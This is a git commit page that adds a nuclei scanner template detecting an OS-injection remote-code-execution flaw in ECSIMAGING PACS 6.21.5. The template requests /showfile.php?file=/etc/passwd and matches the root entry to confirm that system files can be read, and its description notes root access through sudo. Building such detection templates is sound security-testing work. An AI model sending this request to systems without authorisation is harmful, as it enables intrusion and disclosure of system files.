daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create ecsimagingpacs-rce.yaml

patch-1
Ritik Chaddha 2022-05-12 13:50:38 +05:30 committed by GitHub
parent 0b4e41b87f
commit 70501101a6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
vulnerabilities/other/ecsimagingpacs-rce.yaml Normal file
View File

@ -0,0 +1,25 @@
id: ecsimagingpacs-rce
info:
name: ECSIMAGING PACS 6.21.5 - Remote code execution
author: ritikchaddha
severity: critical
description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
reference: https://www.exploit-db.com/exploits/49388
tags: ecsimagingpacs,rce
requests:
- method: GET
path:
- "{{BaseURL}}/showfile.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200